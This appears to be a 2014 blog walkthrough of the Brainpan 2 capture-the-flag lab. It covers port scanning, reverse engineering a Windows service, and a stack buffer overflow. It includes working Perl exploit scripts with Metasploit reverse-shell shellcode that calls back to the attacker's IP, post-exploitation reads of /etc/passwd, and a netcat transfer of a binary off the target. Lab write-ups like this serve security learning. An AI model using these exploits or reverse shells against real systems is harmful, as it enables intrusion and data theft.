2014. január 17., péntek

Brainpan - 2

root@kali:~# netdiscover

192.168.56.104

root@kali:~# unicornscan -mT 192.168.56.104

TCP open                ndmp[10000]

root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000

10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535

9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999

SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");

root@kali:~# nc 192.168.56.104 9999

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

http://192.168.56.104:10000/

root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        10000
+ Start Time:         2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time:           2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

http://192.168.56.104:10000/bin/

brainpan.exe (downloaded)

root@kali:~# hd brainpan.exe | more

4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|

The MZ header shows this is a Windows executable.

root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

root@kali:~# netstat -nl | grep 9999

tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL

root@kali:~# nc 127.0.0.1 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

root@kali:~# nc 192.168.56.104 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED

The password is shitstorm.

This may be a buffer overflow challenge...

I send a big string as the password...

[get_reply] s =

[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  61616161 61616161 61616161 61616161
0x0042f820:  61616161 61616161 61616161 61616161
0x0042f830:  61616161 61616161 61616161 61616161
0x0042f840:  61616161 61616161 61616161 61616161
0x0042f850:  61616161 61616161 61616161 61616161
0x0042f860:  61616161 61616161 61616161 61616161

Hex 0x61 = 'a'

root@kali:~# hexeditor overflow.txt

root@kali:~# nc 127.0.0.1 9999 < overflow.txt

...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~

[get_reply] copied 540 bytes to buffer

 EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820:  00000000 00000000 00000000 00000000

EIP : 69686766 (ihgf) EBP: 65646362 (edcb)

Stack: mlkj qpon utsr yxwv
       }|{z

EIP -> ESP, 69686766 (ihgf) -> 0042f810 

It doesn't work because of the 00 byte in the address.

root@kali:~# wine OLLYDBG.EXE ../brainpan.exe

Search JMP ESP -> 0x311712f3

root@kali:~# hexeditor overflow.txt

[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206(  R- --  I   - -P- )
 EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  90909090 71909090 75747372 79787776
0x0042f820:  7d7c7b7a 00000a7e 00000000 00000000
0x0042f830:  00000000 00000000 00000000 00000010
0x0042f840:  00000000 00000000 00000000 00000000
0x0042f850:  5da40002 0100007f 00000000 00000000
0x0042f860:  0f270002 00000000 00000000 00000000

root@kali:~# pico buf_ov.pl

#!/usr/bin/perl
# Crash reproducer for the brainpan.exe password prompt: 524 bytes of
# padding, the 4-byte address from above, then "C" filler up to 3000 bytes.
# Usage: buf_ov.pl IP_ADDRESS PORT
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}


$baddata = "A" x 524; #  524 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); #  JMP ESP, packed as a 32-bit little-endian value ('V')
$baddata .= "C" x (3000 - length($baddata)); # extends $baddata with "C" to 3000 bytes in total

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive up to 1024 bytes (the banner) from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
 CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
 EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
 ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810:  43434343 43434343 43434343 43434343
0x0042f820:  43434343 43434343 43434343 43434343
0x0042f830:  43434343 43434343 43434343 43434343
0x0042f840:  43434343 43434343 43434343 43434343
0x0042f850:  43434343 43434343 43434343 43434343
0x0042f860:  43434343 43434343 43434343 43434343

root@kali:~# msfpayload  windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl

...

root@kali:~# pico buf_ov.pl

root@kali:~# perl buf_ov.pl 127.0.0.1 9999

[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000

root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

root@kali:~# pico buf_ov2.pl

#!/usr/bin/perl
# Same framing as buf_ov.pl, but the "C" filler is replaced by a short NOP
# sled and the msfencode output generated above.
# Usage: buf_ov2.pl IP_ADDRESS PORT
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}

$nop = "\x90"; # x86 NOP
$baddata = "A" x 524; #  524 "A" characters to $baddata (same padding as buf_ov.pl)
$baddata .= pack('V', 0x311712F3); #  JMP ESP, packed as a 32-bit little-endian value ('V')
$baddata .= $nop x 16; # 16-byte NOP sled in front of the payload
$baddata .= # the 95-byte encoded payload from the msfencode run above
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";

$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";

$socket->recv($sd, 1024); # Receive up to 1024 bytes (the banner) from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket

root@kali:~# nc -l -p 1234

root@kali:~# perl buf_ov2.pl 192.168.56.104 9999

...

id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash

netstat -nlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      995/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      914/python     
udp        0      0 0.0.0.0:19733           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -              
udp6       0      0 :::2659                 :::*                                -              
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     6957     -                   /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     6769     -                   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     7573     -                   /var/run/samba/winbindd_privileged/pipe
unix  2      [ ACC ]     STREAM     LISTENING     7572     -                   /tmp/.winbindd/pipe
unix  2      [ ACC ]     STREAM     LISTENING     9488     999/wineserver      socket
unix  2      [ ACC ]     STREAM     LISTENING     7418     -                   /var/run/dbus/system_bus_socket

cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:

cat checksrv.sh
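#!/bin/bash
# checksrv.sh - watchdog for the two services on this box.
# Restarts brainpan.exe (port 9999) and SimpleHTTPServer (port 10000)
# when nothing is listening on their port any more.  No `set -e` on
# purpose: every probe below is allowed to fail and the restart must
# still run afterwards.

readonly WEB_DIR=/home/puck/web
readonly BRAINPAN_EXE="$WEB_DIR/bin/brainpan.exe"

#######################################
# True when no process holds the given port.
# lsof exits 1 when nothing matched; 0 means a listener was found and
# anything above 1 is an lsof error, both of which leave the service alone.
# Arguments: $1 - port number
# Outputs:   lsof's listing on stdout (kept for the cron log)
#######################################
port_free() {
    lsof -i:"$1"
    [[ $? -eq 1 ]]
}

#######################################
# SIGKILL every process whose command line matches the pattern.
# The old `ps aux | grep ... | grep -v grep` captured whole ps lines, so
# kill was handed user names and timestamps instead of PIDs; pgrep
# yields PIDs only and never matches itself.
# Arguments: $1 - pattern for pgrep -f
# Returns:   0 if at least one matching process was found, 1 otherwise
#######################################
kill_matching() {
    local -a pids
    mapfile -t pids < <(pgrep -f -- "$1")
    (( ${#pids[@]} > 0 )) || return 1
    kill -9 "${pids[@]}"
    return 0
}

# run brainpan.exe if it stops
if port_free 9999; then
    if kill_matching brainpan.exe; then
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine "$BRAINPAN_EXE" &
fi

# run SimpleHTTPServer if it stops
if port_free 10000; then
    kill_matching SimpleHTTPServer
    # SimpleHTTPServer serves its *current* directory, so a failed cd must
    # not fall through to serving whatever directory this script started in.
    cd "$WEB_DIR" || exit 1
    /usr/bin/python -m SimpleHTTPServer 10000
fi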

find / -type f -perm -04000 -ls
525499   64 -rwsr-xr-x   1 root     root        63632 Sep  6  2012 /bin/umount
525495   32 -rwsr-xr-x   1 root     root        31124 Sep  6  2012 /bin/su
525498   88 -rwsr-xr-x   1 root     root        88768 Sep  6  2012 /bin/mount
530420   32 -rwsr-xr-x   1 root     root        30112 Jun 11  2012 /bin/fusermount
525651   40 -rwsr-xr-x   1 root     root        39124 Oct  2  2012 /bin/ping6
525650   36 -rwsr-xr-x   1 root     root        34780 Oct  2  2012 /bin/ping
...
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudo
672442   60 -rwsr-xr-x   1 root     root        60344 Jun 18  2012 /usr/bin/mtr
658477   32 -rwsr-xr-x   1 root     root        30936 Sep  6  2012 /usr/bin/newgrp
658673   32 -rwsr-xr-x   1 root     root        31756 Sep  6  2012 /usr/bin/chsh
658003  116 -rwsr-xr-x   2 root     root       115140 Feb 27  2013 /usr/bin/sudoedit
658676   40 -rwsr-xr-x   1 root     root        40300 Sep  6  2012 /usr/bin/chfn
672094   16 -rwsr-xr-x   1 root     root        14020 Oct  2  2012 /usr/bin/traceroute6.iputils
671718   48 -rwsr-sr-x   1 daemon   daemon      46576 Jun 11  2012 /usr/bin/at
675550   16 -rwsr-xr-x   1 root     lpadmin     13672 Dec  4  2012 /usr/bin/lppasswd
658671   44 -rwsr-xr-x   1 root     root        41292 Sep  6  2012 /usr/bin/passwd
658667   60 -rwsr-xr-x   1 root     root        57964 Sep  6  2012 /usr/bin/gpasswd
672668   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Sep  6  2012 /usr/sbin/uuidd
672521  296 -rwsr-xr--   1 root     dip        301944 Sep 26  2012 /usr/sbin/pppd
656771   12 -rwsr-xr-x   1 anansi   anansi       8761 Mar  4  2013 /usr/local/bin/validate
925433  312 -rwsr-xr--   1 root     messagebus   317564 Oct  3  2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584  244 -rwsr-xr-x   1 root     root       248064 Sep  6  2012 /usr/lib/openssh/ssh-keysign
788361    8 -rwsr-xr-x   1 root     root         5452 Jun 25  2012 /usr/lib/eject/dmcrypt-get-device
657855   12 -rwsr-xr-x   1 root     root         9740 Oct  3  2012 /usr/lib/pt_chown

find / -perm -2 -ls
...

/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

root@kali:~# nc -l -p 12345 > validate

nc 192.168.56.101 12345 < /usr/local/bin/validate

root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan   17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>

I haven't got round to solving this part yet...
